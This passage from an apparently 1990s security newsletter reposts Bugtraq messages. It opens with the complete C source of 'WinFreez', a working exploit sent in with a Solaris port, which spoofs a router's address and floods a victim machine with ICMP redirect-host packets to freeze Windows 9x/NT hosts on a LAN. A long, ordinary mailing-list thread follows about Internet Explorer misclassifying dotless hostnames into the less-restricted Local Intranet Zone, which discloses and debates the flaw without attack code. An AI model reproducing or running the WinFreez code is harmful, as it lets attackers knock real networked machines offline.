  2242.          * carry bits from the top 16 bits into the lower 16 bits.
  2243.          */
  2244.         while (nleft > 1)
  2245.           {
  2246.             sum += *w++;
  2247.             nleft -= 2;
  2248.           }
  2249.       
  2250.         /* mop up an odd byte, if necessary */
  2251.         if (nleft == 1)
  2252.           {
  2253.             *(u_char *) (&answer) = *(u_char *) w;
  2254.             sum += answer;
  2255.           }
  2256.         /* add back carry outs from top 16 bits to low 16 bits */
  2257.         sum = (sum >> 16) + (sum & 0xffff);   /* add hi 16 to low 16 */
  2258.         sum += (sum >> 16);           /* add carry */
  2259.         answer = ~sum;                /* truncate to 16 bits */
  2260.         return (answer);
  2261.       }
  2262.  
  2263.  
  2264.       
  2265.       -=- And a Solaris version:
  2266.       
  2267.       Date: Tue, 9 Mar 1999 22:34:32 -0500
  2268.       From: Max Schubert <mschube@jgvandyke.com>
  2269.       To: BUGTRAQ@netspace.org
  2270.       Subject: Winfreeze.c for Solaris ...
  2271.       
  2272.       Hi,
  2273.          Script kiddie number 25006 here :) ... apologize if this is too
  2274.       trivial to be worth your time ....
  2275.       
  2276.       This is just a port of the Winfreeze.c ICMP redirect exploit for Solaris
  2277.       (posted earlier today) ... tested using Solaris 2.5.1 ...
  2278.       
  2279.       max
  2280.       
  2281.       -------
  2282.       
  2283.       /*
  2284.        WinFreez.c by Delmore <delmore@moscowmail.com>
  2285.       
  2286.        ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box
  2287.        in LAN.
  2288.       
  2289.        Usage: winfreez sendtoip sendfromip time
  2290.        where <sendtoip> is victim host, <sendfromip> is router
  2291.        for victim host, <time> is time in seconds to freeze victim.
  2292.       
  2293.        Note:
  2294.        I've written small exploit for freeze win9x/nt boxes in LAN.
  2295.        Proggy initiates ICMP/Redirect-host messages storm from router
  2296.        (use router ip). Windows will receive redirect-host messages
  2297.        and change own route table, therefore it will be frozen
  2298.        or slowly working during this time.
  2299.       
  2300.        On victim machine route table changes viewing with:
  2301.        ROUTE PRINT
  2302.        command in ms-dos box.
  2303.       
  2304.        Exploit show different result for different system configuration.
  2305.       
  2306.        System results:
  2307.       
  2308.        p200/16ram/win95osr2 is slowly execute application
  2309.        after 20 seconds of storm.
  2310.       
  2311.        p233/96ram/nt4-sp4 is slowly working after 30
  2312.        seconds of storm.
  2313.       
  2314.        p2-266/64ram/win95 working slowly and can't normal execute
  2315.        application.
  2316.       
  2317.       
  2318.        Compiled on RedHat Linux 5, Kernel 2.0.35 (x86)
  2319.        gcc ./winfreez.c -o winfreez
  2320.       
  2321.        --- for Slackware Linux, Kernel 2.0.30
  2322.        If you can't compile due to ip_sum not defined errors,
  2323.        replace (line 207):
  2324.         ip->ip_sum = 0;
  2325.        to line:
  2326.         ip->ip_csum = 0;
  2327.        ---
  2328.       
  2329.        Soldiers Of Satan group
  2330.        Russia, Moscow State University, 05 march 1999
  2331.        http://sos.nanko.ru
  2332.       
  2333.        Thanx to Mark Henderson.
  2334.       
  2335.        */
  2336.       
  2337.       #include <stdio.h>
  2338.       #include <stdlib.h>
  2339.       #include <time.h>
  2340.       #include <string.h>
  2341.       
  2342.       #include <sys/types.h>
  2343.       #include <sys/socket.h>
  2344.       #include <netdb.h>
  2345.       #include <netinet/in.h>
  2346.       #include <netinet/in_systm.h>
  2347.       #include <netinet/ip.h>
  2348.       #include <netinet/ip_icmp.h>
  2349.       #include <errno.h>
  2350.       
  2351.       /*
  2352.        * Structure of an icmp header (from sparc header).
  2353.        */
  2354.       
  2355.       u_short in_cksum (u_short *addr, int len);
  2356.       void attack( char *sendtoip, char *sendfromip, time_t wtime, int s );
  2357.       
  2358.       void main (int argc, char **argv)
  2359.       {
  2360.         time_t wtime;
  2361.         /* setsockopt on Solaris 2.5.1 wants (char *) for 4th arg */
  2362.         char *sendtoip, *sendfromip, *on;
  2363.         int s;
  2364.       
  2365.         if (argc != 4)
  2366.           {
  2367.             fprintf (stderr, "usage: %s sendto sendfrom time\n", argv[0]);
  2368.             exit (1);
  2369.           }
  2370.       
  2371.         sendtoip = (char *)malloc(strlen(argv[1]) + 1);
  2372.         strcpy(sendtoip, argv[1]);
  2373.       
  2374.         sendfromip = (char *)malloc(strlen(argv[2]) + 1);
  2375.         strcpy(sendfromip, argv[2]);
  2376.       
  2377.         wtime = atol(argv[3]);
  2378.       
  2379.         if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
  2380.           {
  2381.             fprintf (stderr, "socket creation error: %s\n", strerror(errno));
  2382.             exit (1);
  2383.           }
  2384.       
  2385.       #ifdef IP_HDRINCL
  2386.         if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof (on)) < 0)
  2387.           {
  2388.             fprintf (stderr, "sockopt IP_HDRINCL error\n" );
  2389.             exit (1);
  2390.           }
  2391.       #endif
  2392.       
  2393.         printf("winfreez by Delmore, <delmore@moscowmail.com>\n");
  2394.         printf("Soldiers Of Satan group, http://sos.nanko.ru\n\n");
  2395.         printf("sendto = %s\n", sendtoip);
  2396.         printf("sendfrom = %s\n", sendfromip);
  2397.         printf("time = %i s\n", wtime);
  2398.       
  2399.         attack( sendtoip, sendfromip, wtime, s );
  2400.       
  2401.         free( (void *) sendtoip );
  2402.         free( (void *) sendfromip );
  2403.       }
  2404.       
  2405.       
  2406.       void attack( char *sendtoip, char *sendfromip, time_t wtime, int s )
  2407.       {
  2408.         time_t curtime, endtime;
  2409.         int i1, i2, i3, i4;
  2410.         char redir[21];
  2411.         char buf[100];
  2412.         struct ip *ip = (struct ip *) buf;
  2413.         struct icmp *icmp = (struct icmp *) (ip + 1);
  2414.         struct hostent *hp;
  2415.         struct sockaddr_in dst;
  2416.       
  2417.         if(wtime==0) return;
  2418.       
  2419.         if ((hp = gethostbyname (sendtoip)) == NULL)
  2420.          if ((ip->ip_dst.s_addr = inet_addr (sendtoip)) == -1)
  2421.            {
  2422.             fprintf (stderr, "%s: unknown sendto\n", sendtoip);
  2423.             exit (1);
  2424.            }
  2425.       
  2426.         if ((hp = gethostbyname (sendfromip)) == NULL)
  2427.          if ((ip->ip_src.s_addr = inet_addr (sendfromip)) == -1)
  2428.            {
  2429.             fprintf (stderr, "%s: unknown sendfrom\n", sendfromip);
  2430.             exit (1);
  2431.            }
  2432.       
  2433.         endtime = time(NULL) + wtime;
  2434.       
  2435.         srand((unsigned int) endtime);
  2436.       
  2437.        do {
  2438.         bzero (buf, sizeof buf);
  2439.       
  2440.         /* sendto/gateway */
  2441.         hp = gethostbyname (sendtoip);
  2442.         bcopy (hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
  2443.         bcopy (hp->h_addr_list[0], &icmp->icmp_gwaddr.s_addr, hp->h_length);
  2444.       
  2445.         /* sendfrom */
  2446.         hp = gethostbyname (sendfromip);
  2447.         bcopy (hp->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length);
  2448.       
  2449.         /* generate redirect*/
  2450.         i1 = 1+(int) (223.0*rand()/(RAND_MAX+1.0));
  2451.         i2 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
  2452.         i3 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
  2453.         i4 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
  2454.       
  2455.         bzero (redir, sizeof redir);
  2456.         sprintf(redir,"%u.%u.%u.%u", i4, i3, i2, i1 );
  2457.       
  2458.         hp = gethostbyname (redir);
  2459.         bcopy (hp->h_addr_list[0], &icmp->icmp_ip.ip_dst.s_addr, hp->h_length);
  2460.       
  2461.         ip->ip_v = 4;
  2462.         ip->ip_hl = sizeof *ip >> 2;
  2463.         ip->ip_tos = 0;
  2464.         ip->ip_len = htons (sizeof buf);
  2465.         ip->ip_id = htons (4321);
  2466.         ip->ip_off = 0;
  2467.         ip->ip_ttl = 255;
  2468.         ip->ip_p = 1;
  2469.         ip->ip_sum = 0;               /* kernel fills this in */
  2470.       
  2471.         bcopy (&ip->ip_dst.s_addr, &icmp->icmp_ip.ip_src.s_addr, sizeof
  2472.       (ip->ip_dst.s_addr));
  2473.         icmp->icmp_ip.ip_v = 4;
  2474.         icmp->icmp_ip.ip_hl = sizeof *ip >> 2;
  2475.         icmp->icmp_ip.ip_tos = 0;
  2476.         icmp->icmp_ip.ip_len = htons (100);   /* doesn't matter much */
  2477.         icmp->icmp_ip.ip_id = htons (3722);
  2478.         icmp->icmp_ip.ip_off = 0;
  2479.         icmp->icmp_ip.ip_ttl = 254;
  2480.         icmp->icmp_ip.ip_p = 1;
  2481.         icmp->icmp_ip.ip_sum = in_cksum ((u_short *) & icmp->icmp_ip, sizeof *ip);
  2482.       
  2483.         dst.sin_addr = ip->ip_dst;
  2484.         dst.sin_family = AF_INET;
  2485.       
  2486.         icmp->icmp_type = ICMP_REDIRECT;
  2487.         icmp->icmp_code = 1; /* 1 - redirect host, 0 - redirect net */
  2488.         icmp->icmp_cksum = in_cksum ((u_short *) icmp, sizeof (buf) - sizeof
  2489.       (*ip));
  2490.       
  2491.         if( sendto( s, buf, sizeof buf, 0, (struct sockaddr *) &dst, sizeof dst) <
  2492.       0 )
  2493.           {
  2494.             fprintf (stderr, "sendto error\n");
  2495.             exit (1);
  2496.           }
  2497.       
  2498.         }while (time(NULL)!=endtime);
  2499.       }
  2500.       
  2501.       /*
  2502.        * in_cksum -- Checksum routine for Internet Protocol family headers (C
  2503.        * Version) - code from 4.4 BSD
  2504.        */
  2505.       u_short in_cksum (u_short *addr, int len)
  2506.       {
  2507.         register int nleft = len;
  2508.         register u_short *w = addr;
  2509.         register int sum = 0;
  2510.         u_short answer = 0;
  2511.       
  2512.         /*
  2513.          * Our algorithm is simple, using a 32 bit accumulator (sum), we add
  2514.          * sequential 16 bit words to it, and at the end, fold back all the
  2515.          * carry bits from the top 16 bits into the lower 16 bits.
  2516.          */
  2517.         while (nleft > 1)
  2518.           {
  2519.             sum += *w++;
  2520.             nleft -= 2;
  2521.           }
  2522.       
  2523.         /* mop up an odd byte, if necessary */
  2524.         if (nleft == 1)
  2525.           {
  2526.             *(u_char *) (&answer) = *(u_char *) w;
  2527.             sum += answer;
  2528.           }
  2529.         /* add back carry outs from top 16 bits to low 16 bits */
  2530.         sum = (sum >> 16) + (sum & 0xffff);   /* add hi 16 to low 16 */
  2531.         sum += (sum >> 16);           /* add carry */
  2532.         answer = ~sum;                /* truncate to 16 bits */
  2533.         return (answer);
  2534.       }
  2535.       
  2536.  
  2537.       
  2538.       @HWA
  2539.       
  2540.       
  2541.  04.5 Unknown Zone: 
  2542.       Windows doesn't properly distinguish between intra and internet zones
  2543.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2544.       
  2545.       Date: Fri, 5 Mar 1999 21:53:18 -0500
  2546.       From: Jim Paris <jim@JTAN.COM>
  2547.       To: BUGTRAQ@netspace.org
  2548.       Subject: More Internet Explorer zone confusion
  2549.       
  2550.       Even after the patch described in Microsoft Security Bulletin MS98-016
  2551.       (http://www.microsoft.com/security/bulletins/ms98-016.asp), IE4 still
  2552.       has big problems with distinguishing between sites that belong in the
  2553.       "Internet Zone" and sites that belong in the "Local Intranet Zone".
  2554.       
  2555.       MS98-016 dealt with addresses such as http://031713501415/, which
  2556.       resolve to Internet hosts but are categorized as being in the "Local
  2557.       Intranet Zone".
  2558.       
  2559.       I've found two cases where the problem still exists.  The first is when
  2560.       the user has the "Domain Suffix Search Order" in the TCP/IP DNS settings
  2561.       set to include domains such as "com".  In that case, the address
  2562.               http://microsoft/
  2563.       will retrieve the page at
  2564.               http://microsoft.com/
  2565.       but it will be considered to be in the "Local Intranet Zone".
  2566.       
  2567.       The second case occurs when a host has an assigned alias in the hosts
  2568.       table (C:\WINDOWS\HOSTS).  A host table entry such as:
  2569.               207.46.131.13   hello
  2570.       will cause the URL
  2571.               http://hello/
  2572.       to retrieve the page at http://207.45.131.13/, but (yep, you guess it)
  2573.       Internet Explorer still considers it to be in the "Local Intranet Zone".
  2574.       
  2575.       This has security implications, since settings for the Local Intranet
  2576.       Zone may be (and, by default, ARE) less secure than those for the
  2577.       Internet Zone.
  2578.       
  2579.       
  2580.       And the funny part?  Microsoft's response when I told them this:
  2581.       
  2582.       --8<---cut here-----------------------------------------
  2583.       
  2584.       Hi Jim -
  2585.       
  2586.       Had a talk with one of the IE developers, and this behavior is correct.
  2587.       Here's why: it's impossible to tell from an IP address whether it's internal
  2588.       or external.  100.100.100.100, or any other address, could be either
  2589.       internal or external, depending on whether you're behind a firewall or not.
  2590.       That means that IE has to rely on the URL.  By convention, an URL that does
  2591.       not end with a "dot-something" (.com, .edu, .gov, etc) is assumed to be an
  2592.       internal site.  I'm told that this is how all web browsers make the
  2593.       distinction.  You have to make specific reconfigurations to allow the
  2594.       dotless URLs to resolve externally. Thanks,
  2595.       
  2596.       Secure@Microsoft.Com
  2597.       
  2598.       --8<---cut here-----------------------------------------
  2599.       
  2600.       
  2601.       "This behavior is correct"?!?!?!  Give me a break.  They obviously
  2602.       didn't think so when they released the MS98-016 bulletin.
  2603.       
  2604.       
  2605.       Jim Paris
  2606.       jim@jtan.com
  2607.       
  2608.       --------------------------------------------------------------------------------
  2609.       
  2610.       Date: Mon, 8 Mar 1999 03:56:27 -0500
  2611.       From: Jeremy Nimmer <bugtraq.user@parity.mit.edu>
  2612.       To: BUGTRAQ@netspace.org
  2613.       Subject: Re: More Internet Explorer zone confusion
  2614.       
  2615.       
  2616.       >MS98-016 dealt with addresses such as http://031713501415/
  2617.       >...
  2618.       >user has the "Domain Suffix Search Order" in the TCP/IP DNS settings
  2619.       >...
  2620.       >The second case occurs when a host has an assigned alias in the hosts
  2621.       >...
  2622.       >"This behavior is correct"?!?!?!  Give me a break.  They obviously
  2623.       >didn't think so when they released the MS98-016 bulletin.
  2624.       >
  2625.       >Jim Paris
  2626.       >jim@jtan.com
  2627.       
  2628.       The difference between MS98-016 and your examples is simple.  The bulletin
  2629.       addressed an issue where an external site could, without your control, fool
  2630.       your browser into thinking a remote site was "local intranet".  In your
  2631.       examples, the user must choose specific settings to allow the problem to
  2632.       occur.  If you are concerned about the problem, simply remove .com, etc.
  2633.       >from your DNS suffix search, and don't put nasty hosts in your hosts file.
  2634.       
  2635.       The zone settings are not meant to be rock-solid security protection.  If
  2636.       they pose a risk to you, set all zones to the maximum security.  This was
  2637.       all already talked about when the above-mentioned bulletin came out.
  2638.       
  2639.       In the end, this is not a "bug" in the browser - it's a configuration
  2640.       problem.  While worthy of mention, it does not deserve flamage.
  2641.       
  2642.       Thanks,
  2643.       -= remmiN ymereJ | Jeremy Nimmer =-
  2644.       
  2645.       --------------------------------------------------------------------------------
  2646.       
  2647.       Date: Mon, 8 Mar 1999 23:37:28 +1300
  2648.       From: Oliver Lineham <oliver@LINEHAM.CO.NZ>
  2649.       To: BUGTRAQ@netspace.org
  2650.       Subject: Re: More Internet Explorer zone confusion
  2651.       
  2652.       At 21:53 5/03/99 -0500, you wrote:
  2653.       
  2654.       Yech.
  2655.       
  2656.       >That means that IE has to rely on the URL.  By convention, an URL that does
  2657.       >not end with a "dot-something" (.com, .edu, .gov, etc) is assumed to be an
  2658.       >internal site.  I'm told that this is how all web browsers make the
  2659.       >distinction.  You have to make specific reconfigurations to allow the
  2660.       >dotless URLs to resolve externally. Thanks,
  2661.       
  2662.       This is insane - and most probably not how it distinguishes domains at all.
  2663.       
  2664.       Such a system implies that the "dot-something"s are hard-coded into the
  2665.       browser! This would be a similar flaw to the original cookie
  2666.       specification's one about domains that I announced last year. Consider:
  2667.       
  2668.        - Country domains. They're not dot-somethings, but under this regime
  2669.       anything from somewhere like New Zealand (.nz) would be a "Local Intranet
  2670.       Site".
  2671.       
  2672.        - New TLDs. Internic goes and adds a .web or .store or something that
  2673.       didn't exist when the browser was released. I'm sure all the e-commerce
  2674.       sites on .store would love their servers being considered "Local Intranet
  2675.       Sites"!
  2676.       
  2677.       If this is how the zones are implemented, then its insane. If not, then
  2678.       IE's claim of being able to distinguish intranet sites from internet ones
  2679.       is an outright lie and the "feature" should be removed.
  2680.       
  2681.       Oliver
  2682.       
  2683.       ---------------------------------------------------
  2684.       Internet Services / Webdesign / Strategic Planning
  2685.       PO Box 30-481, Lower Hutt, NZ  oliver@lineham.co.nz
  2686.       Phone +64 4 566-0627       Facsimile +64 4 570-1900
  2687.       
  2688.       --------------------------------------------------------------------------------
  2689.       
  2690.       Date: Mon, 8 Mar 1999 09:06:23 +0000
  2691.       From: David E. Smith <dave@TECHNOPAGAN.ORG>
  2692.       To: BUGTRAQ@netspace.org
  2693.       Subject: Re: More Internet Explorer zone confusion
  2694.       
  2695.       On Fri, 5 Mar 1999, Jim Paris wrote about the Local Intranet Zone.
  2696.       
  2697.       All the comments made are, technically, correct, but Microsoft could have
  2698.       at least tried. None of these are foolproof, but they're a start.
  2699.       
  2700.       * Be paranoid about entries in the hosts file. Arguably, hosts files are
  2701.       obsolete, thanks to DNS. (No, I won't make the argument.)
  2702.       * Warning dialog boxes for the above, and maybe for anything where the TLD
  2703.       is guessed at. (The http://microsoft/ example. Just warn the user that the
  2704.       requested site was guessed, give some sane options like `Go there, treat
  2705.       it as Internet', `Go there, treat it as local', `Don't go there', and so
  2706.       on.)
  2707.       * Anything that doesn't resolve to a designated local zone (10.*.*.*, and
  2708.       the other reserved addresses) gets the same warning.
  2709.       
  2710.       Or, just change the default behaviour on all those to treat the site as
  2711.       Internet rather than intranet. Probably easier that way, though a bit more
  2712.       troublesome for the user, especially when we guess wrong.
  2713.       
  2714.       Care to take bets on whether anything even remotely like this is ever
  2715.       done?
  2716.       
  2717.       ...dave
  2718.       
  2719.       --------------------------------------------------------------------------------
  2720.       
  2721.       Date: Mon, 8 Mar 1999 00:18:10 -0800
  2722.       From: Walt Armour <walt@BLARG.NET>
  2723.       To: BUGTRAQ@netspace.org
  2724.       Subject: Re: More Internet Explorer zone confusion
  2725.       
  2726.       I would agree that these are still issues but there is a difference
  2727.       between them and the original problem.
  2728.       
  2729.       With the original problem any site could redirect you to a site and make
  2730.       it look like Local Intranet simply by using the 'http://031713501415/'
  2731.       format.
  2732.       
  2733.       With these two new issues someone must have direct knowledge about your
  2734.       machine's configuration or have direct access to your machine in order to
  2735.       make a not-quite-too-common configuration change.  If either of these
  2736.       situations occurs then the safety level of my browser will quickly become
  2737.       the least of my worries.  :)
  2738.       
  2739.       IMO Microsoft is right in saying that the problems are (marginally)
  2740.       different.  Whether or not their method for determining "local intranet"
  2741.       is right is a completely different subject.
  2742.       
  2743.       walt
  2744.       
  2745.       --------------------------------------------------------------------------------
  2746.       
  2747.       Date: Mon, 8 Mar 1999 11:07:19 -0600
  2748.       From: iversen <signal11@MEDIAONE.NET>
  2749.       To: BUGTRAQ@netspace.org
  2750.       Subject: Re: More Internet Explorer zone confusion
  2751.       
  2752.       Oliver Lineham wrote:
  2753.       >  - New TLDs. Internic goes and adds a .web or .store or something that
  2754.       > didn't exist when the browser was released. I'm sure all the e-commerce
  2755.       > sites on .store would love their servers being considered "Local Intranet
  2756.       > Sites"!
  2757.       >
  2758.       > If this is how the zones are implemented, then its insane. If not, then
  2759.       > IE's claim of being able to distinguish intranet sites from internet ones
  2760.       > is an outright lie and the "feature" should be removed.
  2761.       
  2762.       
  2763.       This seems to be trivial to resolve - put everything in the internet zone
  2764.       unless it matches a list containing the local intranets.  Then do
  2765.       reverse-dns
  2766.       of everything that's allegedly inside the intranet and make sure everything
  2767.       matches up.  It isn't a perfect solution, but it would make it substantially
  2768.       harder to fake a remote site as local.  You also get the added benefit of
  2769.       not needing to worry about how IE resolves domains/ip addresses.
  2770.       
  2771.       
  2772.       
  2773.       --
  2774.       signal11@mediaone.net   | BOFH, Malign networks
  2775.       I'll  give you  the TCO of  Linux as soon as my
  2776.       calculator stops saying "divide by zero error."
  2777.       
  2778.       --------------------------------------------------------------------------------
  2779.       
  2780.       Date: Mon, 8 Mar 1999 14:17:43 -0500
  2781.       From: Jim Paris <jim@JTAN.COM>
  2782.       To: BUGTRAQ@netspace.org
  2783.       Subject: Re: More Internet Explorer zone confusion
  2784.       
  2785.       > The difference between MS98-016 and your examples is simple.  The bulletin
  2786.       > addressed an issue where an external site could, without your control, fool
  2787.       > your browser into thinking a remote site was "local intranet".
  2788.       
  2789.       And this can occur with my examples as well.  I didn't control it at
  2790.       all.
  2791.       
  2792.       > In your
  2793.       > examples, the user must choose specific settings to allow the problem to
  2794.       > occur.  If you are concerned about the problem, simply remove .com, etc.
  2795.       > from your DNS suffix search, and don't put nasty hosts in your hosts file.
  2796.       
  2797.       Just because I added a DNS suffix search order and put hosts into my
  2798.       hosts file does not (or, at least, SHOULD not) mean that I am choosing
  2799.       "specific settings to allow the problem to occur".  How was I supposed
  2800.       to know that simplifying my life by adding a search suffix of ".com" was
  2801.       opening me up to a vulnerability?
  2802.       
  2803.       > In the end, this is not a "bug" in the browser - it's a configuration
  2804.       > problem.  While worthy of mention, it does not deserve flamage.
  2805.       
  2806.       No, this is a bug in the browser.  Changing something over at point A
  2807.       shouldn't affect my security at point B.
  2808.       
  2809.       -jim
  2810.       
  2811.       --------------------------------------------------------------------------------
  2812.       
  2813.       Date: Mon, 8 Mar 1999 11:58:55 -0800
  2814.       From: Paul Leach <paulle@MICROSOFT.COM>
  2815.       To: BUGTRAQ@netspace.org
  2816.       Subject: Re: More Internet Explorer zone confusion
  2817.       
  2818.       > -----Original Message-----
  2819.       > From: Oliver Lineham [mailto:oliver@LINEHAM.CO.NZ]
  2820.       > Sent: Monday, March 08, 1999 2:37 AM
  2821.       > To: BUGTRAQ@NETSPACE.ORG
  2822.       > Subject: Re: More Internet Explorer zone confusion
  2823.       >
  2824.       >
  2825.       > At 21:53 5/03/99 -0500, you wrote:
  2826.       >
  2827.       > Yech.
  2828.       >
  2829.       > >That means that IE has to rely on the URL.  By convention,
  2830.       > an URL that does
  2831.       > >not end with a "dot-something" (.com, .edu, .gov, etc) is
  2832.       > assumed to be an
  2833.       > >internal site.  I'm told that this is how all web browsers make the
  2834.       > >distinction.  You have to make specific reconfigurations to allow the
  2835.       > >dotless URLs to resolve externally. Thanks,
  2836.       >
  2837.       > This is insane - and most probably not how it distinguishes
  2838.       > domains at all.
  2839.       
  2840.       That's correct.
  2841.       I believe that the rule for Intranet zone is simple -- if the name has no
  2842.       "." and is less than 15 characters long, then it's Intranet zone. This
  2843.       algorithm works with the default configuration of Windows. If you configure
  2844.       your machine so that the above assumption is violated, then you'll get a
  2845.       mis-classification.
  2846.       
  2847.       When designing better ways of doing this, keep in mind that the primary tool
  2848.       that the browser has to work with is "gethostbyname" -- which, IMO, doesn't
  2849.       return enough information about how the name was resolved to be helpful for
  2850.       security purposes (even though it garnered some in the process of
  2851.       resolution). For example, it doesn't say whether /etc/hosts or LMHOSTS was
  2852.       used to resolve the name, or which DNS search suffix was used.
  2853.       
  2854.       Paul
  2855.       
  2856.       --------------------------------------------------------------------------------
  2857.       
  2858.       Date: Mon, 8 Mar 1999 19:49:32 -0600
  2859.       From: Jeremie <jer@JEREMIE.COM>
  2860.       To: BUGTRAQ@netspace.org
  2861.       Subject: Re: More Internet Explorer zone confusion (new issue)
  2862.       
  2863.       > The assumptions may indeed be flawed, but I don't understand how your
  2864.       > observations below demonstrate that.
  2865.       
  2866.       The assumption:
  2867.       [if the name has no "." and is less than 15 characters long, then it's
  2868.       Intranet zone]
  2869.       
  2870.       Simply:
  2871.       The name "ls" has no "." and is less than 15 characters, and yet it is a
  2872.       valid *Internet* host and should *not* be qualified as "Intranet Zone".
  2873.       
  2874.       Jeremie
  2875.       jer@jeremie.com
  2876.       
  2877.       --------------------------------------------------------------------------------
  2878.       
  2879.       Date: Tue, 9 Mar 1999 01:59:08 -0500
  2880.       From: Christopher Masto <chris@NETMONGER.NET>
  2881.       To: BUGTRAQ@netspace.org
  2882.       Subject: Re: More Internet Explorer zone confusion
  2883.       
  2884.       Is this intranet zone thing _really_ of any value?  Why is there a
  2885.       built-in default assumption that something from a "local" server is
  2886.       more trustworthy?  Consider the following situations:
  2887.       
  2888.       1. A customer of your ISP, netmonger.net, is evil.  They have a page
  2889.          that links or redirects to http://www/~evil/evil.html, taking
  2890.          advantage of the fact that your machine is configured with your
  2891.          ISP's domain in the search list.
  2892.       
  2893.       2. You go to school at RPI.  You have a dorm ethernet connection.
  2894.          Your machine is naive.dorm.rpi.edu, and you have dorm.rpi.edu
  2895.          in your domain search list.  An evil person gets evil.dorm.rpi.edu,
  2896.          and you know the rest.
  2897.       
  2898.       3. You work at Giganticorp and have access to high-level trade secrets.
  2899.          Giganticorp has an intranet where employees can put up their own
  2900.          web pages.  An evil employee takes advantage of the default security
  2901.          settings to gain access to your secrets, which he sells to the
  2902.          competition.
  2903.       
  2904.       Numbers 1 and 2 ask the question, "Why are we assuming that a
  2905.       non-qualified host name implies intranet implies trust?"  Number 3
  2906.       asks the question, "Why are we assuming that intranet implies trust?"
  2907.       Another question is "How many people who use IE have no intranet?"
  2908.       Considering that there are a quantity of tools available to deploy
  2909.       IE at your company with preconfigured settings, why not default to
  2910.       not having this intranet zone.  If Giganticorp needs to turn down
  2911.       the security, they can do so at the same time they're customizing
  2912.       the rest of the settings.
  2913.       
  2914.       I don't personally use Microsoft products, and I am not quite familiar
  2915.       with the specific security precautions that are disabled for the
  2916.       intranet zone, but if they're enough to cause concern on the Internet,
  2917.       the same problems can occur even when the browser isn't malfunctioning
  2918.       at all.
  2919.       --
  2920.       Christopher Masto        Director of Operations      NetMonger Communications
  2921.       chris@netmonger.net        info@netmonger.net        http://www.netmonger.net
  2922.       
  2923.       Free yourself, free your machine, free the daemon -- http://www.freebsd.org/
  2924.       
  2925.       --------------------------------------------------------------------------------
  2926.       
  2927.       Date: Tue, 9 Mar 1999 08:58:43 +0100
  2928.       From: Tilman Schmidt <Tilman.Schmidt@SEMA.DE>
  2929.       To: BUGTRAQ@netspace.org
  2930.       Subject: Re: More Internet Explorer zone confusion
  2931.       
  2932.       At 11:07 08.03.99 -0600, iversen wrote:
  2933.       >Oliver Lineham wrote:
  2934.       >> If this is how the zones are implemented, then its insane. If not, then
  2935.       >> IE's claim of being able to distinguish intranet sites from internet ones
  2936.       >> is an outright lie and the "feature" should be removed.
  2937.       >
  2938.       >This seems to be trivial to resolve - put everything in the internet zone
  2939.       >unless it matches a list containing the local intranets.  Then do
  2940.       >reverse-dns
  2941.       >of everything that's allegedly inside the intranet and make sure everything
  2942.       >matches up.
  2943.       
  2944.       This is of course the correct way to implement an "intranet zone".
  2945.       It has, however, one serious drawback: you have to configure it.
  2946.       Consumer product manufacturers like Microsoft want their product
  2947.       to work as much "out of the box" as possible.
  2948.       
  2949.       However, IMHO there is no way to implement the concept of "intranet
  2950.       zone" reliably without actually telling the browser the exact extent
  2951.       of your intranet one way or other. Heuristics like "if there is no
  2952.       dot in the hostname then let's assume it is in the intranet" just
  2953.       aren't reliable enough to base a security mechanism on.
  2954.       
  2955.       At Mon, 8 Mar 1999 11:58:55 -0800, Paul Leach wrote:
  2956.       >I believe that the rule for Intranet zone is simple -- if the name has no
  2957.       >"." and is less than 15 characters long, then it's Intranet zone. This
  2958.       >algorithm works with the default configuration of Windows. If you configure
  2959.       >your machine so that the above assumption is violated, then you'll get a
  2960.       >mis-classification.
  2961.       
  2962.       It doesn't even work with the default configuration of Windows,
  2963.       because the basic assumption that every host with an FQDN in the
  2964.       same DNS domain as the client is also in the intranet zone is
  2965.       flawed. There are perfectly legitimate configurations where this
  2966.       is not the case.
  2967.       
  2968.       >When designing better ways of doing this, keep in mind that the primary tool
  2969.       >that the browser has to work with is "gethostbyname" -- which, IMO, doesn't
  2970.       >return enough information about how the name was resolved to be helpful for
  2971.       >security purposes (even though it garnered some in the process of
  2972.       >resolution). For example, it doesn't say whether /etc/hosts or LMHOSTS was
  2973.       >used to resolve the name, or which DNS search suffix was used.
  2974.       
  2975.       It is irrelevant how the name was resolved. You need a mechanism
  2976.       to specify the intended scope of your intranet unambiguously,
  2977.       instead of relying on some unspoken assumption like "for our
  2978.       purposes, 'intranet zone' will be taken to mean all hosts which
  2979.       happen to have at least one FQDN in the same domain as the
  2980.       client".
  2981.       
  2982.       --
  2983.       Tilman Schmidt          E-Mail: Tilman.Schmidt@sema.de (office)
  2984.       Sema Group Koeln, Germany       tilman@schmidt.bn.uunet.de (private)
  2985.       "newfs leaves the filesystem in a well known state (empty)."
  2986.                                                       - Henrik Nordstrom
  2987.       
  2988.       --------------------------------------------------------------------------------
  2989.       
  2990.       Date: Tue, 9 Mar 1999 17:15:07 -0500
  2991.       From: Jim Frost <jimf@FROSTBYTES.COM>
  2992.       To: BUGTRAQ@netspace.org
  2993.       Subject: Re: More Internet Explorer zone confusion
  2994.       
  2995.       
  2996.       |This is of course the correct way to implement an "intranet zone".
  2997.       |It has, however, one serious drawback: you have to configure it.
  2998.       |Consumer product manufacturers like Microsoft want their product
  2999.       |to work as much "out of the box" as possible.
  3000.       
  3001.       Since there is no intranet for most consumers this seems like largely a
  3002.       non-issue.  Those with intranets in their home probably know enough to
  3003.       configure it properly.  And businesses should have IT departments whose job it
  3004.       is to manage it.
  3005.       
  3006.       So what's the problem?
  3007.       
  3008.       |It doesn't even work with the default configuration of Windows,
  3009.       |because the basic assumption that every host with an FQDN in the
  3010.       |same DNS domain as the client is also in the intranet zone is
  3011.       |flawed. There are perfectly legitimate configurations where this
  3012.       |is not the case.
  3013.       
  3014.       Not only legitimate, but increasingly common.  Cable modem customers, for
  3015.       instance, tend to have their entire region in the same "intranet": eg
  3016.       customer.ne.mediaone.net.  I assure you that you don't want to treat the entire
  3017.       northeast region of MediaOne customers as trusted in any way, shape, or form.
  3018.       
  3019.       jim
  3020.       
  3021.       @HWA
